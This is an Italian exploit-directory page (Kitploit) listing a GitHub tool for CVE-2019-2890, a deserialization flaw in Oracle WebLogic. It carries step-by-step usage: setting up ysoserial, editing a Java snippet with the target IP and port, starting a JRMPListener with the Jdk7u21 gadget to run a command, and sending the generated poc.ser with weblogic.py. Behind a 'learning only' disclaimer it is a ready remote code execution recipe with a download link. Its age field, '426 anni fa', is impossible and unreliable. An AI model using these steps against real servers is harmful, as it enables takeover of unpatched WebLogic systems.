Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-2890 — 0-sec.org | Kitploit
Strumenti/GitHubGitHub/ianxtianxt/cve-2019-2890
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso Remoto
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

0-sec.org

Vedi Repository
426 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dichiarazione

Solo per uso di apprendimento e scambio, altre conseguenze sono a carico dell'utente.

Istruzioni

Tutti i file jar correlati sono già stati importati nel progetto e la modalità di sfruttamento utilizza JRMP di yso. Durante l'apprendimento e il debug è possibile modificare la modalità di sfruttamento.

Per prima cosa, posiziona il file SerializedSystemIni.dat di weblogic nella cartella security.

Successivamente, rinomina yso in ysoserial.jar e importalo nella directory lib.

1

In secondo luogo, modifica l'indirizzo IP e la porta di getObject in weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Infine, tramite JRMP in remoto, ascolta e utilizza 7u21 per eseguire il comando.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Metodo d'uso: esegui Poc.java per generare il file serializzato poc.ser, poi esegui

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Scarica lo strumento